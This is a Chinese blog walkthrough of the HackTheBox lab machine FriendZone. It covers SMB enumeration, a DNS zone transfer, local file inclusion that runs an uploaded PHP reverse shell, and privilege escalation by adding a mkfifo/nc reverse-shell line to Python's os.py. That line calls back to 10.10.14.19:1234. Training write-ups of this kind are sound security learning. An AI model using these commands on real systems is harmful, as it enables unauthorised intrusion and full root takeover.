HACKTHEBOX--FriendZone

已于 2024-05-26 21:47:41 修改
阅读量1.5k 收藏 41
点赞数 22
文章标签: linux 服务器 网络
于 2024-05-26 21:24:22 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/renielnxy/article/details/139220238
版权

1,扫描:

nmap -Pn -sC  -sV  -vvv   10.10.10.123

扫描结果显示,主机大概率为Linux,且开启了多个端口,我们可以逐一进行分析

445Samba端口

目标开启了445端口,我们可以用nmap进行枚举目录

nmap --script=smb-enum-shares.nse  10.10.10.123  -v

我们可以发现,存在多个共享目录,其中比较有价值的是/general和/Development可以发现这两个目录可以进行匿名登录,并且会存在读写权限

我们依次进行测试

smbclient -N //10.10.10.123/general   //Development

在这两个目录中我们可以得到一个文档,里面存放着可能是某系统的登录方式

至此,目前的Samba没什么价值了

80http端口

我们直接访问http://10.10.10.123

发现了一个域名,先挂上

echo '10.10.10.123 friendzoneportal.red' | tee -a /etc/hosts

仍后重新访问这个域名,发现同上方,通过查看源码和枚举目标目录也没有发现什么价值

53DNS端口
 

对于DNS端口我们可以先行测试是否存在DNS域传输

dig @10.10.10.123 axfr friendzone.red

存在,把域名挂上后,再进行依次访问

443https端口

我们此时已经得到多个域名,依次访问

其中发现这个域名存在一个文件上传功能,但是经过测试发现这个上传功能就目前而言并没有实际意义,并且不一定是真的

继续访问发现一个登录系统,这时候用之前发现的文档进行登录,发现可以登录成功

登录后依照,提升可以访问这个界面,其中大概可以了解到,

我们可以通过  ?image_id=a.jpg&pagename= 来进行目录访问

尝试构建

https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=../../../../../etc/passwd

发现无法访问,这时候我们可以尝试访问dashboard

所以构建

https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=dashboard

成功访问,这时候我们就可以尝试利用之前的Samba上传一个shell了,并且由于Samba在进行目录枚举的时候发现了目录,并且进行直接访问

shell文件可以利用kali自带的php-reverse-shell.php,注意不要忘记更改IP和端口,并且要在本地nc目标端口

https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=/etc/Development/phpshell.php

构建如上命令尝试进行访问后,会成功拿到shell

python -c 'import pty;pty.spawn("/bin/bash")'

输入如下命令,进入一个标准的bash,并且发现此时用户权限为www-data

此时,可以尝试得到用户flag,

得到后,再去到网页目录上,发现mysql_data.conf,并得到如上信息,

这时候,尝试ssh访问目标,

ssh friend@10.10.10.123

发现成功访问并且得到friend用户权限,此时开始提权

提权!

此时我们得到了www-data和friend这两个用户,我们可以通过一些脚本来帮助提权,这里我们先使用一个名为pspy的动态命令检测(GitHub - DominicBreuker/pspy: Monitor linux processes without root permissions

目标主机为64位,下载对应版本,并且进行上传

chmod +x pspy64 //提升至可运行权限
./pspy //运行

我们仔细观察一会,会发现系统会周期性运行其中的两个文件,一个为:

/bin/sh -c /opt/server_admin/reporter.py 

另一个则为:

/usr/bin/python /opt/server_admin/reporter.py 
 

此时我们立刻可以想到通过修改目标文件进行反弹shell因为运行目标文件的权限为root,这样就可以成功提权,理论存在实践开始。

我们并不能直接修改这两个文件,很显然我们没有他们的写权限,但是很幸运的是,目前文件里存在 “import os” 这会链接python的os库,我们可以修改os库来实现修改文件的目地

我们使用friend用户构建如下命令

vi /usr/lib/python2.7/os.py

并且在最下方加上

system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.19 1234 >/tmp/f")

这个命令,记得修改IP和对于端口,这样再下一个运行周期,我们就可以得到对方的反shell了

至此,渗透完成,这台主机还是很有意思的,可以自己试一试,并且再web端其实存在着另一个漏洞,我们下次继续!

LlNingyu
关注
  • 22
    点赞
  • 41
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
hackthebox-friendzone(考点:smb/dns/文件包含/linux修改脚本)
冬萍子癸水
04-14 516
nmap 看到21/139/445就要想到ftp&smb利用,看里面是否藏有敏感信息文件 看到53就要想到dns,修改/etc/hosts,添加10.10.10.123 friendzone.htb 先看ftp,登录不上 再看smb 四个常用指令,都看看,拿越多信息越好 smbmap -H 10.10.10.123 smbclient --list friendzone.htb -U...
hackthebox-admirer (adminer渗透 & python-library-hijacking)
冬萍子癸水
01-23 640
1、扫描 端口很常规,21进去看看有无价值文件,22可能有登录,80信息搜集 C:\root> nmap -A 10.10.10.187 Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-23 13:28 CST Nmap scan report for 10.10.10.187 (10.10.10.187) Host is up (0.41s latency). Not shown: 997 closed ports PORT STATE SE
No.152-HackTheBox-Linux-FriendZone-Walkthrough渗透学习
qq_34801745的博客
06-30 389
** HackTheBox-Linux-FriendZone-Walkthrough ** 靶机地址:https://www.hackthebox.eu/home/machines/profile/173 靶机难度:初级(4.7/10) 靶机发布日期:2019年5月13日 靶机描述: FriendZone is an easy difficulty Linux box which needs fair amount enumeration. By doing a zone transfer vhosts a
HackTheBox - Friendzone Write Up
ak.Gh0st的博客
05-12 446
HackTheBox - Friendzone Write Up
【Hack The BoxLinux练习-- FriendZone
人间体佐菲的博客
11-21 296
【Hack The BoxLinux练习-- FriendZone
Hack the box靶机 friendzone
菜浪马废的博客
05-24 251
之前得到一个账号 登录一下 上传文件
Hack the box靶机 Swagshop
菜浪马废的博客
05-22 423
本来想按照顺序 做friendzone的 看看难度 剩下的四个里 他应该最难 还是往后面放一放吧 想想昨天的那个tartarsauce 我都要崩溃了 ![在这里插入图片描述](https://img-blog.csdnimg.cn/202005221558129.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM4MDA1ODU0,size
破解盒子的友友文章wo metasploit
weixin_26636643的博客
08-24 678
This is the 14th blog out of a series of blogs I will be publishing on retired HTB machines in preparation for the OSCP. The full list of OSCP like machines compiled by TJ_Null can be found here. 这是我将...
oscp学习计划二期
菜浪马废的博客
04-29 1254
一期 只有一点点基础知识的我 看着Google和vulnhub 一边刷练习 一边看笔记 慢慢也有了自己的知识框架 但是还是感觉准备的不充分 笔记 之前就拿CSDN做笔记了 每篇博客都很少有文字 大多都是我的操作截图 不是特别正规 为了备战 明天开始用官方的报告来写 但是他是五个一组 就是在一个文件中 要对五个靶机进行描述 希望我可以一天打五个靶机吧(现在一天最多3) 报告模板已经给了链接 有需要的...
hackthebox-writeups:HacktheBox'boot2root'计算机的编写
05-12
hackthebox撰写HacktheBox计算机(boot2root)的文章和用西班牙语或英语编写的挑战。有关密码保护的重要说明直到2020年3月的机器写入都受到相应的根标志的保护。 但是自此日期以来,HTB标志是动态的,并且对于每个...
HackTheBox-Writes-Ups:HackTheBox CTFC挑战写作
03-20
【标题】"HackTheBox-Writes-Ups:HackTheBox CTFC挑战写作"涉及的是一个网络安全领域的活动,其中“HackTheBox”是一个知名的在线平台,它提供了模拟黑客攻击的环境来提升安全专业人员的技能。CTF(Capture The Flag...
HackTheBox-CTF-Writeups:此备忘单旨在面向CTF玩家和初学者,以帮助他们根据操作系统和难度对Hack The Box Labs进行分类
05-06
HackTheBox CTF速查表 该备忘单面向CTF玩家和初学者,可帮助他们根据操作系统和难度对Hack The Box Labs进行分类。 此列表包含hackingarticles上所有可用的Hack The Box文章。 我们已经根据我们的经验执行并编制了此...
Hack-the-Box-OSCP-Preparation:Hack-the-Box-OSCP-Preparation
03-20
介绍你好呀!如果您不认识我,我叫Rana Khalil,然后按Twitter句柄 。在花了将近八个月的时间,攻读了Offensive Security Certified Professional(OSCP)认证后,我很高兴地宣布我已获得OSCP官方认证!...
HackTheBox靶机系列之困难Reel
04-09
HackTheBox靶机系列之困难Reel 本篇文章主要介绍了Reel靶机的整个利用过程,从侦察到提权,涵盖了渗透测试、漏洞利用、信息收集等多个方面的知识点。 侦察阶段 在Reel靶机中,我们首先进行了侦察,扫描了21、22、...
正式邀测! OS Copilot——一款基于大模型构建的 Linux 智能操作系统助手
weixin_60347558的博客
07-02 546
重塑操作系统交互新体验,开启您的智能化系统管理之旅
Linux:系统安全及应用
pangdongqiqi的博客
07-01 1245
通过su命令可以非常方便地切换为另一个用户,但前提条件是必须知道目标用户的登 录密码。例如,若要从zhangsan 用户切换为 root 用户,必须知道 root 用户的密码。对于生产环 境中的 Linux 服务器,每多一个人知道特权密码,其安全风险也就增加一分。有没有一种折中的办法,既可以让普通用户拥有一部分管理权限,又不需要将 root 用户的密码告诉他呢?答案是肯定的,使用 sudo命令就可以提升执行权限。
Linux存储管理I
m0_54563444的博客
07-03 798
主要知识点: 基本分区、逻辑卷LVM、EXT3/4/XFS文件系统、RAID。
RedHat运维-LinuxSELinux基础4-端口绑定SELinux上下文
最新发布
a15735748145a的博客
07-06 575
12. 将60001/tcp端口上的SELinux上下文由http_port_t调整为gopher_port_t的方法是______________________;13. 将60002/tcp端口上的SELinux上下文由gopher_port_t调整为ssh_port_t的方法是______________________;14. 将60003/tcp端口上的SELinux上下文由ssh_port_t调整为http_port_t的方法是_______________________;
hackthebox - reel
11-03
HackTheBox - Reel是一个在黑客社区非常受欢迎的虚拟机靶场。这个靶场的目标是通过渗透测试和攻击手法,找到并获得系统的管理员权限。靶场基于漏洞存在和网络安全问题,提供了一个真实的环境来练习和提升安全技能。 Reel虚拟机是以恶意软件传播为主题的,这是一个很常见但危险的网络攻击。在解决这个靶场时,你需要进行全面的信息搜集,发现可能的漏洞,并利用这些漏洞来控制系统。你还需要进行各种网络嗅探和流量分析操作,以便找到系统中的隐藏服务和登录凭证。 在攻击过程中,你需要利用各种漏洞包括未经授权的访问和远程执行代码等。还需要理解和使用不同的入侵技术,例如命令注入和文件上传等。此外,你可能还需要对恶意软件的分析和行为进行深入研究,以了解其运行机制。 HackTheBox - Reel不仅测试了你的渗透测试技能,而且还促使你加强对恶意软件攻击和防护的了解。同时,这个靶场还有很多高级技术和技巧需要掌握。通过挑战这样的虚拟机,你可以提高你的安全意识和技能,以应对更复杂和高级的网络攻击。 总之,HackTheBox - Reel是一个非常有挑战性的虚拟机靶场,通过攻击和渗透测试,你将提高你的安全技能,并了解到如何防范和对抗恶意软件传播。这是一个很好的方式来锻炼和提升你的网络安全技术。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值